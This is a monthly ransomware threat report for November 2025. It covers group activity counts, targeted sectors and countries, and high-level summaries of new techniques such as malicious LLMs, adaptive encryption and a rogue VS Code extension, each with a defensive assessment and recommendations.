November 2025 witnessed a dynamic reshaping of the ransomware landscape, characterized by shifts in group activity and the evolution of attack methodologies. While overall incident numbers showed a slight decline following October’s peak, emerging actors like Akira and INC Ransom continued to expand their operational reach, leveraging AI-driven tools, adaptive encryption, and cross-platform targeting. The most impacted sectors included Manufacturing, Professional Services, IT, and Healthcare, reflecting attackers’ focus on environments with high operational pressure and valuable data. Geographically, North America remained the primary target, followed by Western Europe and select Asia-Pacific and Latin American nations. Notably, threat actors employed innovative techniques such as environment-aware encryption, AI-assisted malware creation, and exploitation of trusted software marketplaces, signaling a shift toward more sophisticated, efficient, and opportunistic attacks. These developments highlight a ransomware ecosystem that is increasingly agile, technologically enabled, and globally dispersed, requiring proactive, multi-layered defense strategies to mitigate risk.
Welcome to the November 2025 Ransomware Threat Report. This report delivers a detailed analysis of the ransomware landscape, highlighting the emergence of new ransomware groups, evolving attack techniques, and notable shifts in targeted industries. By examining key trends, tactics, and significant incidents, this report aims to support organizations and security teams in understanding the current threat environment. As ransomware campaigns continue to grow in complexity, this report serves as a vital resource for anticipating future threats and strengthening proactive cybersecurity strategies.
November’s ransomware activity shows a mixed but generally downward trend among the major groups compared to October:
Qilin experienced the most notable decline, dropping from 181 attacks in October to 105 in November, suggesting reduced operational tempo or successful disruption efforts. Cl0p, meanwhile, saw a slight increase, rising from 94 to 101, indicating a modest resurgence. Akira continued its upward trajectory, climbing from 66 to 82 incidents and solidifying its growing presence. INC Ransom and Play recorded small increases, 46 (up from 33) and 27 (up from 26), respectively, showing stable but incremental activity. Overall, November reflects a shift in dominance, with Qilin’s decline allowing groups like Cl0p and Akira to gain relative prominence.
Monthly distribution of ransomware activity in 2025, based solely on percentage share, the year shows a relatively steady pattern, fluctuating mostly between 8% and 11%, with notable peaks in February (16%) and October (12%). The most relevant trend emerges in the last two months: October’s 12% represents one of the highest activity levels of the year, indicating a surge in ransomware operations heading into Q4. In contrast, November’s share decreases to 11%, showing a slight pullback, but still remaining above the yearly average, suggesting that ransomware pressure remained elevated.
In November, ransomware operators continued to target a broad range of industries, with Manufacturing remaining the most affected sector at 87 incidents, highlighting its ongoing vulnerability due to complex supply chains and legacy systems. Consumer Goods & Services and Professional Services followed closely at 77 attacks each, reflecting attackers’ focus on sectors with high data value and operational pressure to restore services quickly. Materials (56), Healthcare (51), and Information Technology (62) also saw substantial activity, underscoring persistent exposure in critical and data-rich environments. Sectors such as Government, Education, and Finance experienced moderate but steady targeting, while Automotive, Energy, and Telecommunications recorded comparatively lower volumes. Notably, 24 cases remained unidentified, indicating ongoing challenges in attribution due to obfuscation tactics. Overall, November’s data shows that ransomware groups continue to diversify their targeting while prioritizing industries where disruption yields maximum leverage.
November’s ransomware activity demonstrates a broadly distributed global impact, with incidents spanning North America, Europe, Asia-Pacific, the Middle East, Latin America, and Africa. North America remains the most heavily affected region, reflecting both its large digital footprint and high concentration of organizations attractive to threat actors. Europe shows consistent targeting across a wide mix of countries, indicating that attackers continue to focus on mature economies with interconnected industries. In the Asia-Pacific region, activity is dispersed across several nations, underscoring the growing exposure of developing and technologically expanding markets. Latin American countries also appear steadily within the dataset, suggesting increased adversary interest as digital adoption accelerates. Meanwhile, the Middle East and parts of Africa register smaller but notable incident volumes, demonstrating that ransomware operations are no longer confined to traditionally high-value regions. Overall, the distribution highlights a truly global threat landscape, with adversaries increasingly opportunistic and willing to target organizations across diverse geographic and economic environments.
The top-targeted countries in November show a clear concentration of activity in a few major regions. The United States stands out overwhelmingly with 337 incidents, making it the most frequently targeted nation due to its large digital ecosystem and high-value industries. A significant drop follows with Canada (34) and the United Kingdom (23), both of which remain prime targets because of their strong economic profiles and extensive online infrastructures. Several European countries form the next tier, including Germany (13) and Switzerland (13), along with Italy (12) and Spain (12), reflecting sustained attacker interest across Western Europe. In the Asia-Pacific region, Australia (12), India (9), Thailand (9), and Japan (8) also show notable activity, underscoring the region’s rising digital exposure. Latin American nations, such as Brazil (10) and Mexico (8), similarly feature in the upper range, indicating expanding threat actor focus as these economies digitize. Overall, these countries represent the core of ransomware targeting in November, driven by a mix of economic opportunity, technological maturity, and global interconnectivity.
Malicious LLMs Like WormGPT 4 and KawaiiGPT Accelerate Cyberattacks
Cybercriminals are increasingly adopting unrestricted AI models such as WormGPT 4 and KawaiiGPT to automate malicious activity. These models can generate polished phishing emails, craft deceptive ransom notes, and even produce scripts that support data theft or system compromise. While WormGPT 4 demonstrated the ability to output a functional ransomware-like encryptor, KawaiiGPT proved capable of generating tools for lateral movement and exfiltration, making advanced attacks more accessible to low-skill actors. Their growing user communities highlight how such models are already influencing real-world threat activity.
ETLM Assessment:
The rise of purpose-built malicious LLMs suggests a shift toward AI-accelerated cybercrime, where attackers rely on models to rapidly produce social engineering lures, automate reconnaissance, and assemble modular code components. Over time, these systems may integrate with underground ecosystems, enabling plug-and-play attack kits that combine AI-generated scripts with commodity malware. We can expect the next phase to include more autonomous tooling, more convincing impersonation attacks, and cross-platform payload generation, reducing the skill barrier and increasing attack velocity. This evolution underscores the need for defensive AI, strict access controls, and continuous monitoring of emerging AI-driven threat capabilities.
Emerging RaaS Signals a Strategic Shift in Criminal Alliances
A new extortion platform under development has surfaced, revealing an effort by a well-known threat collective to launch its own ransomware service instead of relying on borrowed or leaked tools. Early samples show a custom-built encryptor with an extensive feature set, including mechanisms to evade logging, terminate processes, spread across networks, erase recovery options, and apply a unique file structure during encryption. Each compromised system is left with tailored ransom instructions and a warning wallpaper, reflecting a more polished, enterprise-style extortion process. The developers behind the project are also preparing cross-platform versions and a faster variant, indicating plans for a broad, scalable operation.
ETLM Assessment:
The emergence of this platform suggests a movement toward more vertically integrated ransomware operations, where groups build proprietary tooling to avoid dependence on established players. As these actors refine their ecosystem, we can expect more modular payloads, quicker deployment cycles, and hybrid extortion strategies that blend data theft, network disruption, and accelerated negotiation pressure. Continued development across multiple operating environments could extend the threat surface, allowing affiliates to strike diverse targets with greater efficiency. This trajectory highlights the growing sophistication of bespoke criminal toolchains and the importance of anticipating rapid capability upgrades rather than responding only after new variants appear.
Adaptive Encryption Tactics Mark a New Phase in Ransomware Operations
A recently active extortion group has introduced an unusual capability in its malware: the ability to test a system’s performance before choosing how aggressively to encrypt its data. By timing the encryption of temporary files, the operators determine whether a machine can withstand full encryption without drawing attention through heavy resource use. Attacks typically begin with the exploitation of exposed services, followed by credential theft, remote access, and data exfiltration. Once ready, the malware disables recovery mechanisms, benchmarks the host, and then encrypts local drives, shared resources, databases, and virtual infrastructure. A cleanup script erases traces of the intrusion, leaving behind only locked files and a ransom note.
ETLM Assessment:
This adaptive approach signals an evolution toward more strategic, efficiency-driven ransomware deployments. Instead of relying on fixed encryption behaviors, actors are beginning to tailor impact based on the environment, aiming to maximize disruption while minimizing detection. If this trend continues, we can expect broader use of automated pre-attack profiling, dynamic payload tuning, and stealth mechanisms that adjust in real time. Future variants may further integrate reconnaissance data to prioritize high-value assets, shorten dwell time, and streamline extortion. This shift underscores the increasing sophistication of threat actors and the rising importance of proactive monitoring across exposed services, remote access pathways, and virtualization layers.
Akira Broadens Its Reach to New Virtualization Targets
Recent activity shows that Akira has expanded its Linux-based encryptor to lock virtual machines running on an additional major hypervisor platform, widening the operation’s impact beyond its previously known targets. The group has been observed encrypting disk images associated with this environment without first issuing graceful shutdown commands, indicating that its support for the platform is newer and less mature. At the same time, attackers continue to rely on stolen access, weak credentials, and unpatched weaknesses to enter networks, disable recovery mechanisms, and steal data quickly—sometimes within only a few hours.
ETLM Assessment:
This expansion suggests that Akira is steadily adapting to the diversity of enterprise virtual infrastructures. Going forward, more ransomware crews may prioritize cross-hypervisor support to maximize pressure on victims and disrupt critical workloads at scale. As adversaries refine techniques for navigating virtual environments, we may see faster data theft, more automated credential abuse, and broader targeting of backup systems to eliminate recovery paths. Organizations operating virtualized environments should anticipate increasing focus on these platforms and prepare for rapid-strike extortion activity that leverages gaps in configuration and patching.
AI-Generated Ransomware Test Highlights Major Gaps in Microsoft’s Extension Review
A crude but functional ransomware-style extension—apparently built with the help of AI—briefly made its way onto Microsoft’s official VS Code marketplace. The extension openly advertised its ability to steal files, upload them to a remote server, and encrypt local data, yet still passed Microsoft’s vetting process. Once installed, it activated automatically, running a script containing hardcoded keys and network addresses that pointed to basic data-theft and encryption actions. It also checked a private online repository for commands, revealing simple remote-control behavior. Although unsophisticated, the extension demonstrated how easily malicious code can slip past Microsoft’s moderation and reach millions of developers.
ETLM Assessment:
This incident suggests that attackers—even those with minimal skills—may increasingly test or exploit trust in official software marketplaces. With AI lowering the barrier to creating functional malware, future attempts could involve more polished extensions designed to quietly harvest data, inject malicious code into development workflows, or compromise entire supply chains. If review processes remain lenient, threat actors may escalate from obvious “tests” to stealthy implants that blend into legitimate tooling. Developer environments, long considered safe, may become prime entry points for widespread compromise unless marketplace security gains stricter automated and human oversight.
Gootloader Malware Returns After Seven-Month Break
The Gootloader malware operation is back after seven months, once again using fake, search-boosted websites offering legal document templates to trick people into downloading malicious files. When opened, these files give attackers a foothold on the victim’s computer, often leading to ransomware attacks.
The new campaign uses simple but clever tricks to avoid detection, including disguising website text so it looks normal to visitors but unreadable to security tools, and using ZIP files that appear harmless in scans but deliver malware when opened in Windows. Once inside a network, attackers can move quickly—sometimes reaching key systems within hours.
ETLM Assessment:
Gootloader is expected to keep targeting everyday web searches and common document downloads, relying on deception rather than complex techniques. The group is likely to expand its keyword targeting and continue refining tricks that help it blend in and bypass basic security checks. Users and organizations should avoid downloading templates from unknown websites.
Akira
Akira continued to strengthen its position as an emerging ransomware threat in November, showing a notable rise in activity from 71 incidents in October to 82. This steady growth highlights the group’s expanding capabilities, increased targeting, and growing operational confidence. Akira has been steadily building its presence across multiple industries and regions, often leveraging double-extortion tactics and exploiting common vulnerabilities to scale its impact. Its upward trend signals that Akira is transitioning from a mid-tier group into a more prominent and persistent threat, making it one of the key emerging ransomware actors to monitor closely in the coming months.
INC Ransom
INC Ransom continued its upward trajectory throughout the last four months, solidifying its position as a rapidly emerging ransomware group. The group recorded 25 attacks in August, rising to 40 in September, followed by another increase to 34 incidents in October, and then a significant jump to 46 in November. This consistent growth pattern highlights INC Ransom’s expanding operational capability and increasing presence across victim disclosures. The steady month-over-month escalation suggests the group is scaling its infrastructure, improving its extortion methods, and widening its target scope. With this sustained rise, INC Ransom is clearly transitioning from a lower-tier actor into a more prominent and disruptive threat within the ransomware ecosystem.
The Crisis24 OnSolve CodeRED platform suffered a major ransomware attack that disrupted emergency notification systems used by local governments, police, and fire departments across the United States. The incident, later claimed by the INC Ransom gang, forced Crisis24 to permanently decommission its legacy CodeRED environment and rebuild from older backups, causing significant nationwide outages. While the attack was contained to CodeRED, attackers were able to steal sensitive user data.
ETLM Assessment:
This attack highlights a troubling trend: ransomware operators increasingly targeting critical public-safety infrastructure. If groups like INC Ransom continue focusing on emergency platforms, the consequences could escalate—from delayed disaster alerts to compromised law-enforcement communications. The use of outdated legacy systems, as seen with CodeRED, also increases the risk that future attacks could cause longer outages, larger-scale data exposure, and deeper operational disruption.
Operational Disruptions Intensified in High-Dependency Sectors:
Manufacturing, IT, Healthcare, and Professional Services faced the highest disruption risk, with attacks in November frequently affecting production cycles, service delivery commitments, and time-sensitive operations.
Increased Recovery Costs Due to Advanced Techniques:
Adaptive encryption, cross-platform targeting, and expanded virtualization attacks elevated remediation complexity, increasing the cost of system restoration, forensic analysis, and environment rebuilds.
AI-Assisted Threats Reduced Detection Timeframes:
Malicious LLMs accelerated the creation of phishing, reconnaissance scripts, and ransomware components, shrinking the window for organizations to detect and contain intrusions, thereby amplifying downtime and data-loss impact.
Critical Infrastructure and Public-Safety Risks Escalated:
Incidents like the CodeRED attack demonstrated how ransomware now threatens emergency communication platforms, raising the potential for cascading public-safety failures and liability exposure for service providers.
Broader Exposure Through Trusted Tooling and Supply Chains:
The appearance of malicious extensions on official marketplaces highlighted the business risk of compromised development environments, which can lead to tainted software releases, customer impact, and long-term reputational damage.
Global Targeting Increased Compliance and Legal Pressure:
The concentration of attacks in North America, Western Europe, and the Asia-Pacific has heightened regulatory complications, especially for businesses handling sensitive data across multiple jurisdictions.
Growing Threat Actor Fragmentation Increased Unpredictability:
Emerging groups like Akira and INC Ransom demonstrated rapid scaling and capability development, making future threats less predictable and increasing the difficulty of long-term risk planning.
Market Confidence and Customer Trust at Risk:
With high-profile industries hit repeatedly, clients and partners may perceive reduced reliability, impacting contract renewals, customer retention, and competitive positioning.
Impact Assessment
November’s ransomware landscape reflects a cumulative operational strain across both private and public sectors, as expanding threat capabilities fueled by malicious LLMs, adaptive encryption tactics, and new RaaS platforms intensified the disruption potential of each incident. The integration of AI-generated tooling lowered the threshold for producing tailored phishing campaigns, rapid reconnaissance, and functional malware components, increasing attack velocity and straining defensive detection cycles. Vertically integrated ransomware projects and environment-aware encryptors further reduced containment windows, enabling actors to cripple virtual infrastructure, erase recovery paths, and push victims toward faster negotiation. The re-emergence of established threats like Gootloader compounded this pressure by widening the infection funnel through supply-chain adjacent vectors such as search poisoning and malicious developer extensions. Collectively, these developments amplified operational downtime, complicated incident response, and expanded the scale of potential data exposure, especially where legacy systems or automated trust-based ecosystems were involved.
Victimology
Victim profiles during November show attackers concentrating on environments where operational urgency, digital complexity, and data density significantly heighten leverage. Manufacturing, professional services, IT, and healthcare stood out as prime targets due to their reliance on continuous uptime and interconnected infrastructure, while consumer-facing sectors faced pressure stemming from high transactional volume and sensitive customer data. Geographically, the United States remained the core focus, with Canada, the UK, Western Europe, and key Asia-Pacific economies forming the next tier regions characterized by mature digital ecosystems and broad attack surfaces. Actors such as Akira and INC Ransom increasingly expanded toward virtualization-heavy enterprises, while opportunistic vectors like Gootloader pulled in individuals and organizations through routine document-based workflows. Across all regions and industries, the victim pool demonstrates a consistent adversary preference for environments where service disruption, regulatory exposure, or public-safety dependency maximizes extortion value.
November’s ransomware landscape underscores a strategic realignment among threat actors rather than simply an escalation of attack volume. Groups are refining their ecosystems, experimenting with new operational models, and expanding into overlooked attack surfaces—particularly virtualization layers, developer environments, and fragmented supply-chain touchpoints. The month’s shifts point to a maturing ecosystem in which threat actors diversify their footholds, broaden geographic reach, and adjust their tooling based on real-world effectiveness. Established groups recalibrated their activity levels, while emerging clusters demonstrated clearer intent and direction, signaling that the competitive dynamics within the criminal underground are evolving. Overall, the patterns observed in November highlight an ecosystem moving toward specialization, agility, and broader target dispersion, setting the stage for more unpredictable and varied ransomware behavior in the months ahead.
Strengthen Endpoint and Network Defenses
Enhance Threat Intelligence and Monitoring
Implement AI-Aware Security Controls
Backup and Recovery Hardening
User Awareness and Training
Incident Response and Ransomware Playbooks
Vulnerability Management and Patch Hygiene
Proactive Risk Assessment
